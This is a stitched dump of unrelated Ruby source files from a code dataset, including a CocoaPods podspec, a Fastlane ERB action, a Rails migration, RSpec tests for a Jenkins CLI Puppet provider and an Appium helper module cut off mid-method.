calendar.appointments.should_not eq([])
end
end
end | 46.702128 | 145 | 0.788155 |
39bd5158219fa872c772eea1f4a06041fab9cc2e | 1,216 | #
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
require 'json'
payjp_sdk = JSON.parse(File.read(File.join(__dir__, '../sdkconfig.json')))
Pod::Spec.new do |s|
s.name = 'payjp_flutter'
s.version = '0.3.1'
s.summary = 'A Flutter plugin for PAY.JP Mobile SDK.'
s.description = <<-DESC
A Flutter plugin for PAY.JP Mobile SDK.
DESC
s.homepage = 'https://github.com/payjp/payjp-flutter-plugin'
s.license = { :type => 'MIT' }
s.author = { 'PAY.JP (https://pay.jp)' => '[email protected]' }
s.swift_version = '5.0'
s.source = { :path => '.' }
s.source_files = 'Classes/**/*'
s.public_header_files = 'Classes/**/*.h'
s.static_framework = true
s.dependency 'PAYJPFlutterCore', "~> #{payjp_sdk['ios']}"
s.dependency 'CardIO', '~> 5.4.1'
s.dependency 'GoogleUtilities/AppDelegateSwizzler', '~> 7.2'
s.dependency 'Flutter'
# Flutter.framework does not contain a i386 slice. Only x86_64 simulators are supported.
s.pod_target_xcconfig = { 'DEFINES_MODULE' => 'YES', 'VALID_ARCHS[sdk=iphonesimulator*]' => 'x86_64' }
s.ios.deployment_target = '10.0'
end
| 36.848485 | 104 | 0.615954 |
79b5b3f695db17b437dc5ddcc25ae6af39fc5a11 | 3,292 | module Fastlane
module Actions
class ErbAction < Action
def self.run(params)
template = File.read(params[:template])
trim_mode = params[:trim_mode]
result = Fastlane::ErbTemplateHelper.render(template, params[:placeholders], trim_mode)
File.open(params[:destination], 'w') { |file| file.write(result) } if params[:destination]
UI.message("Successfully parsed template: '#{params[:template]}' and rendered output to: #{params[:destination]}") if params[:destination]
result
end
#####################################################
# @!group Documentation
#####################################################
def self.description
"Allows to Generate output files based on ERB templates"
end
def self.details
[
"Renders an ERB template with `:placeholders` given as a hash via parameter.",
"If no `:destination` is set, it returns the rendered template as string."
].join("\n")
end
def self.available_options
[
FastlaneCore::ConfigItem.new(key: :template,
short_option: "-T",
env_name: "FL_ERB_SRC",
description: "ERB Template File",
optional: false,
is_string: true),
FastlaneCore::ConfigItem.new(key: :destination,
short_option: "-D",
env_name: "FL_ERB_DST",
description: "Destination file",
optional: true,
is_string: true),
FastlaneCore::ConfigItem.new(key: :placeholders,
short_option: "-p",
env_name: "FL_ERB_PLACEHOLDERS",
description: "Placeholders given as a hash",
default_value: {},
is_string: false,
type: Hash),
FastlaneCore::ConfigItem.new(key: :trim_mode,
short_option: "-t",
env_name: "FL_ERB_TRIM_MODE",
description: "Trim mode applied to the ERB",
optional: true)
]
end
def self.authors
["hjanuschka"]
end
def self.example_code
[
'# Example `erb` template:
# Variable1 <%= var1 %>
# Variable2 <%= var2 %>
# <% for item in var3 %>
# <%= item %>
# <% end %>
erb(
template: "1.erb",
destination: "/tmp/rendered.out",
placeholders: {
:var1 => 123,
:var2 => "string",
:var3 => ["element1", "element2"]
}
)'
]
end
def self.category
:misc
end
def self.is_supported?(platform)
true
end
end
end
end
| 33.938144 | 146 | 0.423147 |
abc90484fc30dd822258912f7553aad5f33b63c9 | 344 | cask 'font-astloch' do
# version '1.000'
version :latest
sha256 :no_check
url 'https://github.com/google/fonts/trunk/ofl/astloch',
using: :svn,
revision: '50',
trust_cert: true
homepage 'http://www.google.com/fonts/specimen/Astloch'
license :ofl
font 'Astloch-Bold.ttf'
font 'Astloch-Regular.ttf'
end
| 21.5 | 58 | 0.656977 |
6270effacef9bdc544ed04ad891f382a904f3bf5 | 3,317 | # Copyright © 2011-2016 MUSC Foundation for Research Development
# All rights reserved.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
class AddMissingIndexesToForeignKeys < ActiveRecord::Migration
def change
add_index :approvals, :identity_id
add_index :approvals, :sub_service_request_id
add_index :arms, :service_request_id
add_index :associated_surveys, :surveyable_id
add_index :associated_surveys, :survey_id
add_index :calendars, :subject_id
add_index :charges, :service_id
add_index :clinical_providers, :identity_id
add_index :document_groupings, :service_request_id
add_index :documents, :sub_service_request_id
add_index :documents, :document_grouping_id
add_index :line_items, :sub_service_request_id
add_index :line_items, :service_id
add_index :line_items, :ssr_id
add_index :line_items_visits, :arm_id
add_index :line_items_visits, :line_item_id
add_index :messages, :notification_id
add_index :notes, :identity_id
add_index :notes, :sub_service_request_id
add_index :notifications, :sub_service_request_id
add_index :notifications, :originator_id
add_index :pricing_setups, :organization_id
add_index :project_roles, :identity_id
add_index :protocols, :next_ssr_id
add_index :service_providers, :identity_id
add_index :service_relations, :related_service_id
add_index :sub_service_requests, :owner_id
add_index :sub_service_requests, :ssr_id
add_index :subjects, :arm_id
add_index :subsidies, :sub_service_request_id
add_index :super_users, :identity_id
add_index :taggings, :tagger_id
add_index :toast_messages, :sending_class_id
add_index :tokens, :identity_id
add_index :user_notifications, :identity_id
add_index :user_notifications, :notification_id
add_index :visits, :line_items_visit_id
add_index :visits, :visit_group_id
end
end
| 52.650794 | 145 | 0.78987 |
abb8c632a0d39e5ab98b0dba438d5b44c8fd4e65 | 2,966 | #TODO: Extract Daybreak specific stuff into a Daybreak extension.
require_dependency 'application_controller'
class PublicAccessExtension < Radiant::Extension
version "0.2"
description "Provides public access (signup/signin) to website."
url ""
define_routes do |map|
map.tell 'tell' ,:controller => 'users', :action => 'tell'
map.user_unlock 'users/unlock/:id/:key',:controller => 'users', :action => 'unlock'
map.user_bounce 'admin/bounce' ,:controller => 'admin/users', :action => 'bounce'
map.user_login 'users/:action/:id' ,:controller => 'users'
map.welcome 'admin/welcome' ,:controller => 'admin/users', :action => 'bounce'
map.welcome 'admin/gc' ,:controller => 'admin/tasks', :action => 'collect_garbage'
map.welcome 'admin/monitor_memory' ,:controller => 'admin/tasks', :action => 'monitor_memory'
map.welcome 'admin/free_megabytes' ,:controller => 'admin/tasks', :action => 'free_megabytes'
end
def activate
Radiant::Config.class_eval do
#need 'org.root_url'; need 'org.name'; need 'org.return_email'; need 'org.contact_email'
end
ApplicationHelper.module_eval do
include MarkupHelpers::Toggles
include MarkupHelpers::AuthenticityToken
include MarkupHelpers::Radiant
end
ApplicationController.class_eval do
include Memorylogic
include Styler
include ShareLayouts::Helper
include PublicAccess::SetDefaultAssets
extend PublicAccess::SetDefaultAssets::ClassMethods
before_filter :set_default_assets
before_filter :inject_assets
end
Page.instance_eval do
def generate_key(len = 12)
chars = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
key = ""
1.upto(len) { |i| key << chars[rand(chars.size-1)] }
return key
end
end
Page.class_eval do #TODO: extract to common area.
def part!(name)
part(name) || self.parts.build(:name => name.to_s)
end
end
User.class_eval do
extend PublicAccess::User::ClassMethods
include PublicAccess::User
validates_presence_of :email, :message => 'required' #Required for person linking
belongs_to :person
end
UserActionObserver.observe User, Page, Layout, Snippet, Person, Group, Message, Series #, Photo #TODO better modularize.
Admin::WelcomeController.class_eval{include PublicAccess::LandingPage}
Admin::UsersController.class_eval{include PublicAccess::UsersController}
Admin::PagesController.class_eval{only_allow_access_to :index, :new, :create, :edit, :update, :destroy, :when => [:admin,:staff,:writer,:designer], :denied_url => {:controller => '/admin/users', :action => 'bounce'}}
Admin::SnippetsController.class_eval{only_allow_access_to :index, :new, :create, :edit, :update, :destroy, :when => [:admin,:designer], :denied_url => {:controller => '/admin/users', :action => 'bounce'}}
end
end
| 45.630769 | 220 | 0.673972 |
6291e30daab0310d6b2a7b0829997c7f8a3a5f68 | 757 | # frozen_string_literal: true
module Agris
module Api
module Messages
class Import < MessageBase
def initialize(model)
@model = model
end
def message_number
82_320
end
def message_hash
{
xml: xml_hash
}
end
protected
def input_hash
{
:@endofprocessoption => 1,
:@altnameidonfile => 'N',
:@usecurdate4outofrange => 'N',
:@reportoption => 1,
:@usefile => false
}
end
def xml_hash
xml_base_hash.merge(
details: { detail: @model.records.map(&:to_xml_hash) }
)
end
end
end
end
end
| 18.463415 | 66 | 0.471598 |
e2972a93f323bf2723ccc15ec6e27d347f693c0e | 57 | $LOAD_PATH << File.expand_path('../../../lib', __FILE__)
| 28.5 | 56 | 0.614035 |
612c450bf2567e20f064100e727da73b9682c2d7 | 34 | puts 'kerker' + 2.to_s + 'herher'
| 17 | 33 | 0.617647 |
7a3b8cc60eefa39a84dc2277cef55711dd488848 | 727 | # Cookbook Name:: wazuh-manager
# Attributes:: agent_conf
# Author:: Wazuh <[email protected]
default['ossec']['centralized_configuration'] = {
'enabled' => 'no',
'path' => '/var/ossec/etc/shared/default'
}
# Example of configuration to include in agent.conf
# <agent_config os="Linux">
# <localfile>
# <location>/var/log/linux.log</location>
# <log_format>syslog</log_format>
# </localfile>
# </agent_config>
# Would require to be be declared like:
# default['ossec']['centralized_configuration']['conf']['agent_config']= [
# { "@os" => "Linux",
# "localfile" => {
# "location" => "/var/log/linux.log",
# "log_format" => "syslog"
# }
# }
# ]
| 25.068966 | 74 | 0.584594 |
911449621c20c7eafa037463eed3efeb6af94c3c | 21,410 | require 'spec_helper'
require 'unit/puppet/x/spec_jenkins_providers'
# we need to make sure retries is always loaded or random test ordering can
# cause failures when a side effect hasn't yet caused the lib to be loaded
require 'retries'
require 'puppet/x/jenkins/provider/cli'
describe Puppet::X::Jenkins::Provider::Cli do
AuthError = Puppet::X::Jenkins::Provider::Cli::AuthError
NetError = Puppet::X::Jenkins::Provider::Cli::NetError
UnknownError = Puppet::X::Jenkins::Provider::Cli::UnknownError
CLI_AUTH_ERRORS = [<<-EOS, <<-EOS, <<-EOS].freeze
anonymous is missing the Overall/Read permission
EOS
You must authenticate to access this Jenkins.
Use --username/--password/--password-file parameters or login command.
EOS
anonymous is missing the Overall/RunScripts permission
EOS
CLI_NET_ERRORS = [<<-EOS, <<-EOS].freeze
SEVERE: I/O error in channel CLI connection
EOS
java.net.SocketException: Connection reset
EOS
shared_context 'facts' do
before do
Facter.add(:jenkins_cli_jar) { setcode { 'fact.jar' } }
Facter.add(:jenkins_url) { setcode { 'http://localhost:11' } }
Facter.add(:jenkins_ssh_private_key) { setcode { 'fact.id_rsa' } }
Facter.add(:jenkins_puppet_helper) { setcode { 'fact.groovy' } }
Facter.add(:jenkins_cli_tries) { setcode { 22 } }
Facter.add(:jenkins_cli_try_sleep) { setcode { 33 } }
end
end
before do
Facter.clear
# clear class level state
if described_class.class_variable_defined?(:@@cli_auth_required)
described_class.class_variable_set(:@@cli_auth_required, false)
end
allow(described_class).to receive(:command).with(:java).and_return('java')
end
describe '::suitable?' do
it { expect(described_class.suitable?).to eq true }
end
include_examples 'confines to cli dependencies'
describe '::sname' do
it 'returns a short class name' do
expect(described_class.sname).to eq 'Jenkins::Provider::Cli'
end
end
describe '::instances' do
it 'is not implemented' do
expect { described_class.instances }.to raise_error(Puppet::DevError)
end
end
describe '::prefetch' do
let(:catalog) { Puppet::Resource::Catalog.new }
it 'associates a provider with an instance' do
resource = Puppet::Type.type(:notify).new(name: 'test')
catalog.add_resource resource
provider = described_class.new(name: 'test')
expect(described_class).to receive(:instances).
with(catalog) { [provider] }
described_class.prefetch(resource.name => resource)
expect(resource.provider).to eq provider
end
it 'does not break an existing resource/provider association' do
resource = Puppet::Type.type(:notify).new(name: 'test')
catalog.add_resource resource
provider = described_class.new(name: 'test')
resource.provider = provider
expect(described_class).to receive(:instances).
with(catalog) { [provider] }
described_class.prefetch(resource.name => resource)
expect(resource.provider).to eq provider
end
end # ::prefetch
describe '#create' do
context ':ensure' do
it do
provider = described_class.new
expect(provider.instance_variable_get(:@property_hash)[:ensure]).to eq nil
provider.create
expect(provider.instance_variable_get(:@property_hash)[:ensure]).to eq :present
end
end
end # #create
describe '#exists?' do
context 'when :ensure is unset' do
it do
provider = described_class.new
expect(provider.exists?).to eq false
end
end
context 'when :ensure is :absent' do
it 'returns true' do
provider = described_class.new(ensure: :absent)
expect(provider.exists?).to eq false
end
end
context 'when :ensure is :present' do
it 'returns true' do
provider = described_class.new(ensure: :present)
expect(provider.exists?).to eq true
end
end
end # #exists?'
describe '#destroy' do
context ':ensure' do
it do
provider = described_class.new
expect(provider.instance_variable_get(:@property_hash)[:ensure]).to eq nil
provider.destroy
expect(provider.instance_variable_get(:@property_hash)[:ensure]).to eq :absent
end
end
end # #destroy
describe '#flush' do
it 'clears @property_hash' do
provider = described_class.new
provider.create
provider.flush
expect(provider.instance_variable_get(:@property_hash)).to eq({})
end
end # #flush
describe '#cli' do
let(:provider) { described_class.new }
it 'is an instance method' do
expect(provider).to respond_to(:cli)
end
it 'has the same method signature as ::cli' do
expect(described_class.new).to respond_to(:cli).with(2).arguments
end
it 'wraps ::cli class method' do
expect(described_class).to receive(:cli).with('foo', {})
provider.cli('foo', {})
end
it 'extracts the catalog from the resource' do
resource = Puppet::Type.type(:notify).new(name: 'test')
catalog = Puppet::Resource::Catalog.new
resource.provider = provider
catalog.add_resource resource
expect(described_class).to receive(:cli).with(
'foo', catalog: catalog
)
provider.cli('foo', {})
end
end # #cli
describe '#clihelper' do
let(:provider) { described_class.new }
it 'is an instance method' do
expect(provider).to respond_to(:clihelper)
end
it 'has the same method signature as ::clihelper' do
expect(described_class.new).to respond_to(:clihelper).with(2).arguments
end
it 'wraps ::clihelper class method' do
expect(described_class).to receive(:clihelper).with('foo', {})
provider.clihelper('foo', {})
end
it 'extracts the catalog from the resource' do
resource = Puppet::Type.type(:notify).new(name: 'test')
catalog = Puppet::Resource::Catalog.new
resource.provider = provider
catalog.add_resource resource
expect(described_class).to receive(:clihelper).with(
'foo', catalog: catalog
)
provider.clihelper('foo', {})
end
end # #clihelper
describe '::clihelper' do
shared_examples 'uses default values' do
it 'uses default values' do
expect(described_class).to receive(:cli).with(
['groovy', '/usr/lib/jenkins/puppet_helper.groovy', 'foo'], {}, []
)
described_class.clihelper('foo')
end
end # uses default values
shared_examples 'uses fact values' do
it 'uses fact values' do
expect(described_class).to receive(:cli).with(
['groovy', 'fact.groovy', 'foo'], {}, []
)
described_class.clihelper('foo')
end
end # uses fact values
shared_examples 'uses catalog values' do
it 'uses catalog values' do
expect(described_class).to receive(:cli).with(
['groovy', 'cat.groovy', 'foo'],
{ catalog: catalog },
[]
)
described_class.clihelper('foo', catalog: catalog)
end
end # uses catalog values
it 'is a class method' do
expect(described_class).to respond_to(:clihelper)
end
it 'wraps ::cli class method' do
expect(described_class).to receive(:cli)
described_class.clihelper('foo')
end
context 'no catalog' do
context 'no facts' do
include_examples 'uses default values'
end # no facts
context 'with facts' do
include_context 'facts'
include_examples 'uses fact values'
end # with facts
end # no catalog
context 'with catalog' do
let(:catalog) { Puppet::Resource::Catalog.new }
context 'no jenkins::cli::config class' do
context 'no facts' do
include_examples 'uses default values'
end # no facts
context 'with facts' do
include_context 'facts'
include_examples 'uses fact values'
end # with facts
end # no jenkins::cli::config class
context 'with jenkins::cli::config class' do
before do
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config',
puppet_helper: 'cat.groovy'
)
catalog.add_resource jenkins
end
context 'no facts' do
include_examples 'uses catalog values'
end # no facts
context 'with facts' do
include_context 'facts'
include_examples 'uses catalog values'
end # with facts
end # with jenkins::cli::config class
end # with catalog
end # ::clihelper
describe '::cli' do
before do
# disable with_retries sleeping to [vastly] speed up testing
#
# we are relying the side effects of ::suitable? from a previous example
Retries.sleep_enabled = false
end
shared_examples 'uses default values' do
it 'uses default values' do
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
)
described_class.cli('foo')
end
end # uses default values
shared_examples 'uses fact values' do
it 'uses fact values' do
expect(described_class.superclass).to receive(:execute).with(
'java -jar fact.jar -s http://localhost:11 foo',
failonfail: true, combine: true
)
described_class.cli('foo')
end
end # uses fact values
shared_examples 'uses catalog values' do
it 'uses catalog values' do
expect(described_class.superclass).to receive(:execute).with(
'java -jar cat.jar -s http://localhost:111 foo',
failonfail: true, combine: true
)
described_class.cli('foo', catalog: catalog)
end
end # uses catalog values
it 'is a class method' do
expect(described_class).to respond_to(:cli)
end
it 'wraps the superclasses ::execute method' do
expect(described_class.superclass).to receive(:execute)
described_class.cli('foo')
end
context 'no catalog' do
context 'no facts' do
include_examples 'uses default values'
end # no facts
context 'with facts' do
include_context 'facts'
include_examples 'uses fact values'
end # with facts
end # no catalog
context 'with catalog' do
let(:catalog) { Puppet::Resource::Catalog.new }
context 'no jenkins::cli::config class' do
context 'no facts' do
include_examples 'uses default values'
end # no facts
context 'with facts' do
include_context 'facts'
include_examples 'uses fact values'
end # with facts
end # no jenkins::cli::config class
context 'with jenkins::cli::config class' do
before do
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config',
cli_jar: 'cat.jar',
url: 'http://localhost:111',
ssh_private_key: 'cat.id_rsa',
cli_tries: 222,
cli_try_sleep: 333
)
catalog.add_resource jenkins
end
context 'no facts' do
include_examples 'uses catalog values'
end # no facts
context 'with facts' do
include_context 'facts'
include_examples 'uses catalog values'
end # with facts
end # with jenkins::cli::config class
end # with catalog
context 'auth failure' do
context 'without ssh_private_key' do
CLI_AUTH_ERRORS.each do |error|
it 'does not retry cli on AuthError exception' do
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
).and_raise(AuthError, error)
expect { described_class.cli('foo') }.
to raise_error(AuthError)
end
end
end
# without ssh_private_key
context 'with ssh_private_key' do
let(:catalog) { Puppet::Resource::Catalog.new }
before do
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config',
ssh_private_key: 'cat.id_rsa'
)
catalog.add_resource jenkins
end
it 'tries cli without auth first' do
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
)
described_class.cli('foo', catalog: catalog)
end
CLI_AUTH_ERRORS.each do |error|
it 'retries cli on AuthError exception' do
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
).and_raise(AuthError, error)
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 -i cat.id_rsa foo',
failonfail: true, combine: true
)
described_class.cli('foo', catalog: catalog)
# and it should remember that auth is required
expect(described_class.superclass).not_to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
)
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 -i cat.id_rsa foo',
failonfail: true, combine: true
)
described_class.cli('foo', catalog: catalog)
end
end
end # with ssh_private_key
end # auth failure
context 'network failure' do
context 'without ssh_private_key' do
CLI_NET_ERRORS.each do |error|
it 'does not retry cli on AuthError exception' do
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
).exactly(30).times.and_raise(NetError, error)
expect { described_class.cli('foo') }.
to raise_error(NetError)
end
end
end
# without ssh_private_key
end # network failure
context 'when UnknownError exception' do
let(:catalog) { Puppet::Resource::Catalog.new }
context 'retry n times' do
it 'by default' do
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config'
)
catalog.add_resource jenkins
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
).exactly(30).times.and_raise(UnknownError, 'foo')
expect { described_class.cli('foo', catalog: catalog) }.
to raise_error(UnknownError, 'foo')
end
it 'from catalog value' do
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config',
cli_tries: 2
)
catalog.add_resource jenkins
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
).exactly(2).times.and_raise(UnknownError, 'foo')
expect { described_class.cli('foo', catalog: catalog) }.
to raise_error(UnknownError, 'foo')
end
it 'from fact' do
Facter.add(:jenkins_cli_tries) { setcode { 3 } }
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config'
)
catalog.add_resource jenkins
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
).exactly(3).times.and_raise(UnknownError, 'foo')
expect { described_class.cli('foo', catalog: catalog) }.
to raise_error(UnknownError, 'foo')
end
it 'from catalog overriding fact' do
Facter.add(:jenkins_cli_tries) { setcode { 3 } }
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config',
cli_tries: 2
)
catalog.add_resource jenkins
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
).exactly(2).times.and_raise(UnknownError, 'foo')
expect { described_class.cli('foo', catalog: catalog) }.
to raise_error(UnknownError, 'foo')
end
end # n times
context 'waiting up to n seconds' do
# this isn't behavioral testing because we don't want to either wait
# for the wallclock delay timeout or attempt to accurate time examples
it 'by default' do
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config'
)
catalog.add_resource jenkins
expect(described_class).to receive(:with_retries).with(hash_including(max_sleep_seconds: 2))
described_class.cli('foo', catalog: catalog)
end
it 'from catalog value' do
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config',
cli_try_sleep: 3
)
catalog.add_resource jenkins
expect(described_class).to receive(:with_retries).with(hash_including(max_sleep_seconds: 3))
described_class.cli('foo', catalog: catalog)
end
it 'from fact' do
Facter.add(:jenkins_cli_try_sleep) { setcode { 4 } }
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config'
)
catalog.add_resource jenkins
expect(described_class).to receive(:with_retries).with(hash_including(max_sleep_seconds: 4))
described_class.cli('foo', catalog: catalog)
end
it 'from catalog overriding fact' do
Facter.add(:jenkins_cli_try_sleep) { setcode { 4 } }
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config',
cli_try_sleep: 3
)
catalog.add_resource jenkins
expect(described_class).to receive(:with_retries).with(hash_including(max_sleep_seconds: 3))
described_class.cli('foo', catalog: catalog)
end
end
end # should retry cli on UnknownError
context 'options with :stdinjson' do
RSpec::Matchers.define :a_json_doc do |x|
match { |actual| JSON.parse(actual) == x }
end
let(:realm_oauth_json) do
<<-EOS
{
"setSecurityRealm": {
"org.jenkinsci.plugins.GithubSecurityRealm": [
"https://github.com",
"https://api.github.com",
"42",
"43",
"read:org"
]
}
}
EOS
end
let(:realm_oauth) { JSON.parse(realm_oauth_json) }
it 'generates a temp file with json output' do
tmp = instance_double('Template')
expect(Tempfile).to receive(:open) { tmp }
expect(tmp).to receive(:write).with(a_json_doc(realm_oauth))
expect(tmp).to receive(:flush)
expect(tmp).to receive(:close)
expect(tmp).to receive(:unlink)
expect(tmp).to receive(:path) { '/dne.tmp' }
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true,
combine: true,
stdinfile: '/dne.tmp'
)
described_class.cli('foo', stdinjson: realm_oauth)
end
end # options with :stdinjson
context 'options with :stdin' do
it 'generates a temp file with stdin string' do
tmp = instance_double('Template')
expect(Tempfile).to receive(:open) { tmp }
expect(tmp).to receive(:write).with('bar')
expect(tmp).to receive(:flush)
expect(tmp).to receive(:close)
expect(tmp).to receive(:unlink)
expect(tmp).to receive(:path) { '/dne.tmp' }
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true,
combine: true,
stdinfile: '/dne.tmp'
)
described_class.cli('foo', stdin: 'bar')
end
end # options with :stdin
end # ::cli
end
| 31.119186 | 102 | 0.61163 |
219035edf8fc4464dce9769292fd2c7030478d9d | 1,151 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'redtube_api/version'
Gem::Specification.new do |spec|
spec.name = "redtube_api"
spec.version = RedtubeApi::VERSION
spec.authors = ["Kevin Kirsche"]
spec.email = ["[email protected]"]
spec.summary = %q{Unoffical API wrapper for the RedTube developer API.}
spec.description = %q{Unofficial API wrapper for the RedTube developer API giving you the ability to easily work with all of the features within this adult website.}
spec.homepage = "https://github.com/kkirsche/redtube_api/"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.9"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "minitest", "~> 5.6"
spec.add_runtime_dependency "hurley", "~> 0.1"
end
| 42.62963 | 169 | 0.667246 |
912c8173e44f1e358e20b05c8708b73e07b2a86e | 462 | # == Schema Information
#
# Table name: review_replies
#
# id :integer not null, primary key
# review_id :integer
# msg :text default("")
# created_at :datetime not null
# updated_at :datetime not null
#
# Indexes
#
# index_review_replies_on_review_id (review_id)
#
class ReviewReply < ApplicationRecord
belongs_to :review
validates :review_id, presence: true
validates :msg, presence: true
end
| 22 | 53 | 0.651515 |
4a5ade4ccdf792801afd673a9c21bba486b88e81 | 6,485 | require 'selenium/webdriver/common/error'
# Generic helper methods not specific
# to a particular tag name
module Appium
module Common
# json and ap are required for the source method.
require 'json'
require 'ap' # awesome print
require 'timeout' # for wait
# iOS .name returns the accessibility attribute if it's set. if not set, the string value is used.
# Android .name returns the accessibility attribute and nothing if it's not set.
#
# .text should be cross platform so prefer that over name, unless both
# Android and iOS have proper accessibility attributes.
# .text and .value should be the same so use .text over .value.
#
# secure class_name is iOS only because it can't be implemented using uiautomator for Android.
#
# find_element :text doesn't work so use XPath to find by text.
# Return block.call and ignore any exceptions.
def ignore(&block)
block.call
rescue Exception # rubocop:disable Lint/HandleExceptions, Lint/RescueException
end
# Navigate back.
# @return [void]
def back
@driver.navigate.back
end
# For Sauce Labs reporting. Returns the current session id.
def session_id
@driver.session_id
end
# Returns the first element that matches the provided xpath.
#
# @param xpath_str [String] the XPath string
# @return [Element]
def xpath(xpath_str)
find_element :xpath, xpath_str
end
# Returns all elements that match the provided xpath.
#
# @param xpath_str [String] the XPath string
# @return [Array<Element>]
def xpaths(xpath_str)
find_elements :xpath, xpath_str
end
def _print_source(source)
opts = Nokogiri::XML::ParseOptions::NOBLANKS | Nokogiri::XML::ParseOptions::NONET
if source.start_with? '<html'
doc = Nokogiri::HTML(source) { |cfg| cfg.options = opts }
else
doc = Nokogiri::XML(source) { |cfg| cfg.options = opts }
end
puts doc.to_xml indent: 2
end
# @private
# http://nokogiri.org/Nokogiri/XML/SAX.html
class CountElements < Nokogiri::XML::SAX::Document
attr_reader :result
def initialize
reset
end
def reset
@result = Hash.new 0
end
# http://nokogiri.org/Nokogiri/XML/SAX/Document.html
def start_element(name, attrs = [])
# Count only visible elements. Android is always visible
element_visible = @driver.device_is_android? ? true : Hash[attrs]['visible'] == 'true'
@result[name] += 1 if element_visible
end
def formatted_result
message = ''
sorted = @result.sort_by { |_element, count| count }.reverse
sorted.each do |element, count|
message += "#{count}x #{element}\n"
end
message.strip
end
end # class CountElements
# Returns a string of class counts of visible elements.
def get_page_class
parser = @count_elements_parser ||= Nokogiri::XML::SAX::Parser.new(CountElements.new)
parser.document.reset
parser.parse get_source
parser.document.formatted_result
end
# Count all classes on screen and print to stdout.
# Useful for appium_console.
def page_class
puts get_page_class
nil
end
# Converts pixel values to window relative values
#
# ```ruby
# px_to_window_rel x: 50, y: 150
# ```
def px_to_window_rel(opts = {})
w = @driver.window_size
x = opts.fetch :x, 0
y = opts.fetch :y, 0
OpenStruct.new(x: "#{x.to_f} / #{w.width.to_f}",
y: "#{y.to_f} / #{w.height.to_f}")
end
# @private
def lazy_load_strings
# app strings only works on local apps.
# on disk apps (ex: com.android.settings) will error
@strings_xml ||= ignore { app_strings } || {}
end
# Search strings.xml's values for target.
# @param target [String] the target to search for in strings.xml values
# @return [Array]
def xml_keys(target)
lazy_load_strings
